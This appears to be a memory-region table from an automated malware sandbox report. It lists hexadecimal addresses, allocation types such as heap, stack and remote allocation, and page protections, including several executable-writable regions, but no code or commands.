25E00000
trusted library allocation
page read and write
25E60000
trusted library allocation
page execute and read and write
25FC0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
233EC000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
232B4000
trusted library allocation
page read and write
231FD000
trusted library allocation
page read and write
409000
unkown
page write copy
233C3000
trusted library allocation
page read and write
25430000
heap
page execute and read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
22B3E000
stack
page read and write
230F0000
trusted library allocation
page read and write
25F70000
trusted library allocation
page read and write
234FA000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
66C0000
direct allocation
page read and write
25E20000
trusted library allocation
page read and write
230E0000
heap
page read and write
2750000
trusted library allocation
page read and write
230AD000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
24367000
trusted library allocation
page read and write
8810000
direct allocation
page execute and read and write
400000
unkown
page readonly
22CEE000
stack
page read and write
620000
direct allocation
page read and write
231F0000
trusted library allocation
page read and write
230D0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
6650000
direct allocation
page read and write
254E1000
heap
page read and write
2577E000
stack
page read and write
2820000
heap
page readonly
22A00000
heap
page read and write
23100000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
261B0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
630000
heap
page read and write
25E00000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
8800000
direct allocation
page execute and read and write
30B000
trusted library allocation
page execute and read and write
8F7000
heap
page read and write
22E70000
heap
page read and write
230D0000
trusted library allocation
page read and write
25F70000
trusted library allocation
page execute and read and write
8D0000
direct allocation
page read and write
25E20000
trusted library allocation
page read and write
409000
unkown
page read and write
230F0000
trusted library allocation
page read and write
256BE000
stack
page read and write
6A5F000
stack
page read and write
231F0000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
25E60000
trusted library allocation
page read and write
442000
unkown
page readonly
25E00000
trusted library allocation
page read and write
6A0000
trusted library section
page read and write
401000
unkown
page execute read
230F0000
trusted library allocation
page read and write
245BC000
trusted library allocation
page read and write
7CD3000
heap
page read and write
446000
unkown
page readonly
254E1000
heap
page read and write
2734000
trusted library allocation
page read and write
22D50000
remote allocation
page read and write
231F0000
trusted library allocation
page read and write
2749000
trusted library allocation
page read and write
7C28000
heap
page read and write
230F0000
trusted library allocation
page read and write
6B2000
heap
page read and write
25E20000
trusted library allocation
page read and write
232BC000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
2316D000
stack
page read and write
230F0000
trusted library allocation
page read and write
24689000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
2428A000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
2428F000
trusted library allocation
page read and write
25F60000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
245A0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
23274000
trusted library allocation
page read and write
21FF000
stack
page read and write
230F0000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
7CAE000
heap
page read and write
6B99000
heap
page read and write
231F0000
trusted library allocation
page read and write
23110000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
879E000
stack
page read and write
460000
heap
page read and write
6A7000
heap
page read and write
230F0000
trusted library allocation
page read and write
24231000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
233BB000
trusted library allocation
page read and write
43F0000
trusted library allocation
page read and write
25E30000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
23283000
trusted library allocation
page read and write
261B0000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
2431B000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
230D0000
trusted library allocation
page read and write
261A0000
trusted library allocation
page read and write
28A7000
heap
page read and write
6620000
direct allocation
page read and write
22BBC000
stack
page read and write
22E50000
trusted library allocation
page read and write
234B7000
trusted library allocation
page read and write
8C0000
direct allocation
page read and write
261D0000
trusted library allocation
page read and write
7D62000
heap
page read and write
2D3000
trusted library allocation
page execute and read and write
25E30000
trusted library allocation
page read and write
273D000
trusted library allocation
page execute and read and write
22F40000
trusted library allocation
page read and write
2733000
trusted library allocation
page execute and read and write
25E20000
trusted library allocation
page read and write
6EE000
heap
page read and write
23100000
trusted library allocation
page read and write
24347000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
6870000
heap
page read and write
6B07000
trusted library allocation
page read and write
4AE000
stack
page read and write
230F0000
trusted library allocation
page read and write
23120000
heap
page read and write
25E20000
trusted library allocation
page read and write
7D43000
heap
page read and write
6C41000
heap
page read and write
231F0000
trusted library allocation
page read and write
6E8F000
stack
page read and write
2410000
heap
page read and write
590000
heap
page read and write
23020000
trusted library allocation
page read and write
45B2000
trusted library allocation
page read and write
25E50000
trusted library allocation
page read and write
252B1000
heap
page read and write
70C000
heap
page read and write
25F50000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
896D000
direct allocation
page execute and read and write
25E50000
trusted library allocation
page read and write
23100000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page execute and read and write
231F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
6C00000
heap
page read and write
8150000
trusted library allocation
page read and write
261C0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
6660000
direct allocation
page read and write
2950000
heap
page read and write
25E20000
trusted library allocation
page read and write
1DE000
stack
page read and write
246B1000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
7F3A8000
trusted library allocation
page execute and read and write
245F6000
trusted library allocation
page read and write
24293000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
25FB5000
trusted library allocation
page read and write
2200000
heap
page read and write
6FD0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
6F30000
trusted library allocation
page read and write
25F50000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
6860000
heap
page read and write
25E00000
trusted library allocation
page read and write
6F20000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
24272000
trusted library allocation
page read and write
6AE000
heap
page read and write
7CE9000
heap
page read and write
25E20000
trusted library allocation
page read and write
261E0000
trusted library allocation
page execute and read and write
610000
direct allocation
page read and write
7AAE000
stack
page read and write
230F0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25FB0000
trusted library allocation
page read and write
231F0000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
7B50000
trusted library allocation
page read and write
25E00000
trusted library allocation
page read and write
350000
heap
page read and write
25E00000
trusted library allocation
page read and write
442000
unkown
page readonly
2740000
trusted library allocation
page read and write
65CE000
stack
page read and write
230F0000
trusted library allocation
page read and write
1E0000
heap
page read and write
230F0000
trusted library allocation
page read and write
5701000
trusted library allocation
page read and write
230C0000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
409D000
remote allocation
page execute and read and write
2850000
heap
page read and write
7A20000
heap
page read and write
25E00000
trusted library allocation
page read and write
57E000
stack
page read and write
23100000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
261D0000
trusted library allocation
page read and write
2F2000
trusted library allocation
page read and write
261A0000
trusted library allocation
page read and write
47A000
heap
page read and write
452000
unkown
page readonly
6D40000
trusted library allocation
page read and write
25E20000
trusted library allocation
page read and write
22DF0000
direct allocation
page read and write
7C56000
heap
page read and write
25E00000
trusted library allocation
page read and write
230F0000
trusted library allocation
page read and write
25E10000
trusted library allocation
page execute and read and write
2780000
trusted library allocation
page read and write
There are 895 hidden memdumps, click here to show them.